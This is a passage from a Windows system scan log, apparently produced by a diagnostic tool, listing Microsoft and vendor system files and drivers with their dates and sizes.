2010-11-20 15:25 - 00412160 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\wisptis.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\wusa.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00299520 _____ (Microsoft Corporation) C:\Windows\system32\rdpshell.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\schtasks.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00240640 _____ (Microsoft Corporation) C:\Windows\system32\cscobj.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\PkgMgr.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\credui.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\rdpinit.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00177152 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00067072 _____ (Microsoft Corporation) C:\Windows\splwow64.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\PushPrinterConnections.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\FXSSVC.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00653312 _____ (Microsoft Corporation) C:\Windows\system32\lpksetup.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr 2015-09-19 16:11 - 2010-11-20 15:24 - 00442368 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv 2015-09-19 16:11 - 2010-11-20 15:24 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\msinfo32.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00345088 _____ (Microsoft Corporation) C:\Windows\system32\cmd.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00343040 _____ (Microsoft Corporation) C:\Windows\system32\lsm.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00337920 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00288256 _____ (Microsoft Corporation) C:\Windows\system32\MSNP.ax 2015-09-19 16:11 - 2010-11-20 15:24 - 00272896 _____ (Microsoft Corporation) C:\Windows\system32\mcbuilder.exe 2015-09-19 16:11 - 2010-11-20 15:24 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\aitagent.exe 2015-09-19 16:11 - 2010-11-20 14:55 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll 2015-09-19 16:11 - 2010-11-20 14:51 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2015-09-19 16:11 - 2010-11-20 14:32 - 05066752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthFWSnapin.dll 2015-09-19 16:11 - 2010-11-20 14:30 - 00079232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvgumd32.dll 2015-09-19 16:11 - 2010-11-20 14:24 - 01292096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2015-09-19 16:11 - 2010-11-20 14:23 - 00144768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\basecsp.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 02755072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themeui.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01712640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsservices.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01667584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setupapi.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01619456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL 2015-09-19 16:11 - 2010-11-20 14:21 - 01363456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Query.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01229824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01175040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01128448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01115136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RacEngn.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 01010688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00980992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFolder.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00626176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00505856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00492032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00351232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00350208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00283648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsGdiConverter.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00270848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00269824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wldap32.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00224256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnp.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00204800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spp.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00140800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SessEnv.dll 2015-09-19 16:11 - 2010-11-20 14:21 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 01414144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 01328128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\propsys.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NaturalLanguage6.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbc32.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00563712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00547840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PortableDeviceApi.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00406528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll 2015-09-19 16:11 - 2010-11-20 14:20 - 00152064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 02151936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcndmgr.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 01493504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 01390080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 01236992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00741376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00732160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi2fs.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00716800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00599552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00584192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpprefcl.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00541696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00389120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00296448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00257024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00232448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00206336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\framedynos.dll 2015-09-19 16:11 - 2010-11-20 14:19 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfreadwrite.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 02522624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01828352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d9.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01792000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01555456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certmgr.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01371136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01154048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 01076736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00854016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00762880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\azroles.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00522752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00508416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00485888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00339968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appmgr.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drvstore.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00270336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00252928 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00219136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1core.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credui.dll 2015-09-19 16:11 - 2010-11-20 14:18 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3api.dll 2015-09-19 16:11 - 2010-11-20 14:17 - 02616320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 01049600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00302592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcbuilder.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskeng.exe 2015-09-19 16:11 - 2010-11-20 14:08 - 00837632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2015-09-19 16:11 - 2010-11-20 14:08 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll 2015-09-19 16:11 - 2010-11-20 13:04 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2015-09-19 16:11 - 2010-11-20 12:52 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys 2015-09-19 16:11 - 2010-11-20 12:44 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\1394ohci.sys 2015-09-19 16:11 - 2010-11-20 11:58 - 00244224 _____ (Microsoft Corporation) C:\Windows\system32\vmicsvc.exe 2015-09-19 16:11 - 2010-11-20 11:28 - 00468992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00514560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00158208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2015-09-19 16:11 - 2010-11-20 11:26 - 00328192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys 2015-09-19 16:11 - 2010-11-20 11:26 - 00287744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2015-09-19 16:11 - 2010-11-20 11:25 - 00753664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys 2015-09-19 16:11 - 2010-11-20 11:23 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys 2015-09-19 16:11 - 2010-11-20 11:23 - 00261632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys 2015-09-19 16:11 - 2010-11-20 11:21 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys 2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\SysWOW64\locale.nls 2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\system32\locale.nls 2015-09-19 16:11 - 2010-11-05 03:58 - 00049488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netfxperf.dll 2015-09-19 16:11 - 2009-07-14 03:16 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tcpmonui.dll 2015-09-19 16:10 - 2010-11-20 15:44 - 01077248 _____ (Microsoft Corporation) C:\Windows\system32\Narrator.exe 2015-09-19 16:10 - 2010-11-20 15:34 - 00363392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgrx.sys 2015-09-19 16:10 - 2010-11-20 15:34 - 00071552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys 2015-09-19 16:10 - 2010-11-20 15:34 - 00034688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsc.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00410496 _____ (Intel Corporation) C:\Windows\system32\Drivers\iaStorV.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00263040 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll 2015-09-19 16:10 - 2010-11-20 15:33 - 00213888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdyboost.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00171392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scsiport.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00152960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00140672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msdsm.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00103808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sbp2port.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00095616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00094592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00078720 _____ (Hewlett-Packard Company) C:\Windows\system32\Drivers\HpSAMD.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00075136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00063360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\termdd.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00052096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhv.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00031104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msahci.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00027520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Diskdump.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 02217856 _____ (Microsoft Corporation) C:\Windows\system32\bootres.dll 2015-09-19 16:10 - 2010-11-20 15:32 - 00334208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00179072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00155520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ataport.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00112000 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe 2015-09-19 16:10 - 2010-11-20 15:32 - 00027008 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amdxata.sys 2015-09-19 16:10 - 2010-11-20 15:28 - 00780008 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2015-09-19 16:10 - 2010-11-20 15:28 - 00223248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys 2015-09-19 16:10 - 2010-11-20 15:28 - 00166784 _____ (Microsoft Corporation) C:\Windows\system32\basecsp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02250752 _____ (Microsoft Corporation) C:\Windows\system32\SensorsCpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02193920 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01689600 _____ (Microsoft Corporation) C:\Windows\system32\netcenter.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01363968 _____ (Microsoft Corporation) C:\Windows\system32\wdc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 01120768 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01031680 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00933376 _____ (Microsoft Corporation) C:\Windows\system32\SmiEngine.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00812032 _____ (Microsoft Corporation) C:\Windows\system32\wpccpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00799744 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00691200 _____ (Microsoft Corporation) C:\Windows\system32\VAN.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\PerfCenterCPL.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00633344 _____ (Microsoft Corporation) C:\Windows\system32\riched20.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00611840 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00568832 _____ (Microsoft Corporation) C:\Windows\system32\scrptadm.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00509952 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00486400 _____ (Microsoft Corporation) C:\Windows\system32\powercpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00483840 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00475136 _____ (Microsoft Corporation) C:\Windows\system32\wlangpui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00462336 _____ (Microsoft Corporation) C:\Windows\system32\wiadefui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\nshipsec.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00418816 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\prnfldr.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00403968 _____ (Microsoft Corporation) C:\Windows\system32\untfs.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\mtxclu.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\wcncsvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00366080 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00357888 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\srchadmin.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\tapisrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00290304 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00268288 _____ (Microsoft Corporation) C:\Windows\system32\MSAC3ENC.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 00264192 _____ (Microsoft Corporation) C:\Windows\system32\upnp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\onex.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00232960 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\sppcomapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00225280 _____ (Microsoft Corporation) C:\Windows\system32\SndVolSSO.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\wmpsrcwp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\netiohlp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00214016 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\rasppp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\netjoin.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\provsvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\ocsetapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00156160 _____ (Microsoft Corporation) C:\Windows\system32\prntvpt.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00148992 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll 2015-09-19 16:10 - 2010-11-20 15:27 